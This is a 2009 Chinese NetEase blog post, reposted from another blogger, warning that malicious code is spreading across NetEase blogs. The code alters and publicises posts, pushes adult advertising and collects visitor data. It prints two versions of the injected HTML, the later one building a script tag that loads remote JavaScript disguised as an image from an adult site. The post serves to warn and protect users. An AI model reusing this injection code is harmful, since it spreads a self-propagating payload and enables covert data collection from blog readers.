最近网易博客上流传的恶意代码
2009-06-23 22:04:29| 分类:
默认分类
| 标签:
|举报
|字号大中小 订阅
这几天在我的网易博客中发现莫名奇妙地被写入了代码,另外,就是本来的私人日志忽然公开了,也听博友说过无法发表评论的事,同时,看到不少博友也中招了,现转载一文,提醒博友们注意。同时,请网易博客管理员尽快想办法解决此事!
下文转载自: 最近网易博客上流传的恶意代码 - 超哥的日志 - 网易博客
现象:
一篇正常的日志,莫名其妙地在日志的头部会多出一段代码:
<IMG title=0 height=0 alt=0 src="http://hi.baidu.com.googl0/ee.cn/ee.jpg" width=0> <A href="http://love.avtupian.com/a/163/index.html" target=_blank><IMG title=AV美女图片站:http://avtupian.com去了就想... alt=AV美女图片站:http://avtupian.com去了就想... src="http://love.avtupian.com/a/163/daolian.gif"></A>
|
而且删掉之后还会被加上。
有同学分析过代码,该代码除了弹广告、修改日志、自动分享日志外,还搜集用户个人信息,包括IP地址等。
建议使用IE浏览器的同学尽快打上补丁,或是使用非IE内核的浏览器上网。
6月22日晚Update:根据博友“老港”同学提供的线索,目前代码的形式已变为:
<img title="" alt="" src="http://hi.baidu.com.googl0/ee.cn/ee.jpg" height="0" width="0"><img title="" alt="" src="http://hi.baidu.com.googl0/ee.cn/ee.jpg" s=document.createElement('script');s.src='http://love.avtupian.com/a/163/blog.jpg';s.type='text/javascript';s.charset='gb2312';document.getElementsByTagName('head').item(0).appendChild(s);" width="0" height="0"> |
而且在网易博客上蔓延速度很快,随便去查看了一些博友的日志,大多数都不幸中招!
中招的博客貌似发表评论会不成功,有些还会在日志正文出现乱码。
顺便调查一下,中招的同学你们用的浏览器是什么?是IE6?IE7?IE8?还是其他的浏览器?(感觉中招的基本上都是用低版本的IE。)
引文来源
最近网易博客上流传的恶意代码 - 超哥的日志 - 网易博客
评论这张
转发至微博
转发至微博
关闭
玩LOFTER,免费冲印20张照片,人人有奖!
我要抢>
<#--最新日志,群博日志-->
<#--推荐日志-->
<#--引用记录-->
<#--博主推荐-->
<#--随机阅读-->
<#--首页推荐-->
<#--历史上的今天-->
<#--被推荐日志-->
<#--上一篇,下一篇-->
<#-- 热度 -->
<#-- 网易新闻广告 -->
<#--右边模块结构-->
<#--评论模块结构-->
<#--引用模块结构-->
<#--博主发起的投票-->
评论